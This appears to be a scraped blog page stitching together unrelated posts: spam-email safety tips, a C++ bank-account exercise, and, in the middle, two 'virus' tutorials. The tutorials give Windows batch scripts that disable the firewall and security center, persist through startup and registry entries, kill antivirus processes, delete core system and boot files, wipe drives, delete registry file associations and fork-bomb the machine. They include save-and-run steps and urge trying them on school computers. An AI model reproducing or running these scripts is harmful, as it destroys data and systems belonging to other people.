Email Spamming

How to Identify Spam Emails?

It is good to have knowledge about spam detection technique before to answer any email. When users have knowledge about spam mails, they can prevent them from being a victim of email spamming. I have discussed some useful techniques to identify the spam mails that are as under.
  • Spam emails always come from unknown senders having odd email address. Such emails ask to reset password, and login credentials etc. Therefore, it is wise to check the sender information of suspicious message.
  • Spam emails may contain grammar mistakes and oddly worded sentences.
  • Spam emails may contain punctuation and capitalization errors.
  • Any lottery or contest winning mails should be avoided especially, when a user did not apply to any contest or lottery. Such mails ask for password or login details to complete the lottery procedure to steal user personal information.
  • Do not download any mail attachment if it is from an unknown source. Such attachments often contain a virus or malware that might infect the user system.

    How to stop getting spam emails?

    After getting knowledge about email spamming, there are some precautions that users should take while dealing with emails.
    • Phishers grab bulk email addresses of people and use them to post free stuff offers like TV, mobile phone or any electronic device.
    • Do not share primary email address anywhere as it can put the user at risk.
    • User does not need to click “Unsubscribe” link as spammers know about the valid email address, and it will help to generate more spam. Therefore, it is best to delete spam mails.
    • Avoid using the same username and emailing address for mail account. Spammers can easily identify the email address of a user by username.
    • If the user receives any spam message in his/her inbox, then user should click on “Report a Spam” button so the next time such as mail sender will be counted as spam mail.
    • Apart from these, there are many companies like SpamExperts offering different services and tools that can help you to filter such emails and provides better security against such emails.

    Spam in the spotlight in 2014:

    In January 2014, the world witnessed few spamming activities rather than lottery winning, corporate job offering, dating sites etc.
    • English-Russian language mass mailing that offered video surveillance system.
    • Nigerian fraudsters announced false death of Nelson Mandela and Ariel Sharon (Israel Prime Minister).
    • Holiday spam mail related to meal trip, flower offering, romantic tip etc to steal money from people.

    Conclusion:

    Email spamming is a common technique but can make heavy damage to user’s privacy. The above precautions are necessary to avert such a perilous situation. Currently, many anti-spam tools are available to fight against spam mails.

Verry very Dangerous Virus Program using Batch Programming

Hi readers, here is another very very dangerous virus progrmming using Batch programming. This is very very danger than the previous virus code. So be careful than the before one.
Viruc will do:
*.Copy itself for multiple times.
*.This will disable the restore option by deleting the restore file.
*.This will disable the login option.
*.If this affect the system, then the user can't use his OS longer.

start
color 5
title Your Fucked, lol
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now fucked
msg * You got owned!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34

GOTO LOOP

Copy this code into notepad and save as name.bat(while saving select all files instead of text files)
This is dangerous virus. So Handle it with careful. Don't try in your pc or friend pc. Just try in your school or college.

Make Viruses

THESE VIRUSES ARE VERY HARMFUL..... DON'T TRY ON YOUR OWN COMPUTER!!
Click start -> all programs -> accessories -> notepad
Or just press or click windows key + r :: run window will open and
type notepad and hit enter .
NOW TYPE THE FOLLOWING CODE ::
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
then save it as name.bat and the batch file is created .
WARNING :: This is the most dangerous
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
Save as .bat
@echo off
:a
start
start
start
start
start
start
goto:a
Save as .bat
:virus
md %random%
goto virus
save in "all files" as .bat
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save it as a .bat file. This will shutdown a PC forever!!!!!

Bank Transaction

Define a class to represent a bank account. Include the following members:

Data Members
1    Name of the depositor
2    Account Number
3    Type of account
4    Balance amount in the account

Member function
1    To assign initial values
2    To deposit an amount
3    To withdraw an amount after checking the balance
4    To display name and Balance

write a main program to test the program.

#include <iostream.h>
#include <iomanip.h>
#include <conio.h>


class bank
{

    private:
    char name[20];
    int acno;
    static int count;
    char actype[20];
    int bal;
    public :
        void opbal(void);
        void deposit(int ac);
        void withdraw(int ac);
        void display(void);
        int fo;

};


void bank :: opbal(void)
{

    cout<<endl<<endl;
    cout<<"Enter Name :-";
    cin>>name;
    cout<<"Enter A/c no. :-";
    cin>>acno;
    cout<<"Enter A/c Type :-";
    cin>>actype;
    cout<<"Enter Opening Balance:-";
    cin>>bal;
}


void  bank :: display(void)
{

    cout<<setw(50)<<"DETAILS"<<endl;
    cout<<setw(50)<<"name      "<<name<<endl;
    cout<<setw(50)<<"A/c. No.     "<<acno<<endl;
    cout<<setw(50)<<"A/c Type      "<<actype<<endl;
    cout<<setw(50)<<"Balance     "<<bal<<endl;
    cout<<setw(50)<<"---------------------";
}

void bank :: deposit(int ac)
{

    if(acno==ac)
    {
    cout<<"Enter Deposit amount :-";
    int deposit=0;
    cin>>deposit;
    deposit=deposit+bal;
    cout<<"\nDeposit Balance = "<<deposit;
    bal=deposit;
    fo=1;


    }

}

void bank :: withdraw(int ac)
{
    if(acno==ac)
    {
    int withdraw;
    cout<<"\nBalance Amount = "<<bal;
    cout<<"\nEnter Withdraw Amount :-";
    cin>>withdraw;
    bal=bal-withdraw;
    cout<<"After Withdraw Balance is "<<bal;
    fo=1;
    }
}


void main()
{
    clrscr();
    bank o1[10];
    int choice,i=0,j,ac;
    do
    {
            cout<<"\n\nChoice List\n\n";
            cout<<"1)  To assign Initial Value\n";
            cout<<"2)  To Deposit\n";
            cout<<"3)  To Withdraw\n";
            cout<<"4)  To Display All Details\n";
            cout<<"5)  EXIT\n";
            cout<<"Enter your choice :-";
            cin>>choice;
            switch(choice)
            {
                case 1:

                    o1[i++].opbal();

                    break;

                case 2:
                    cout<<"Enter A/c no. :-";
                    cin>>ac;
                    for(j=0;j<i;j++)
                    {
                        o1[j].deposit(ac);
                        if(o1[j].fo==1)
                        {
                             o1[j].fo=0;
                             break;
                        }

                    }
                    break;
                case 3: cout<<"Enter A/c no. :-";
                    cin>>ac;
                    for(j=0;j<i;j++)
                    {
                        o1[j].withdraw(ac);
                        if(o1[j].fo==1)
                        {
                             o1[j].fo=0;
                             break;
                        }

                    }
                    break;


                case 4:  clrscr();

                for(j=0;j<i;j++)
                {
                        o1[j].display();
                        cout<<"Press any key to continue...";
                        getch();

                }
                break;
                case 5: goto end;
            }
     }while(1);
end:
}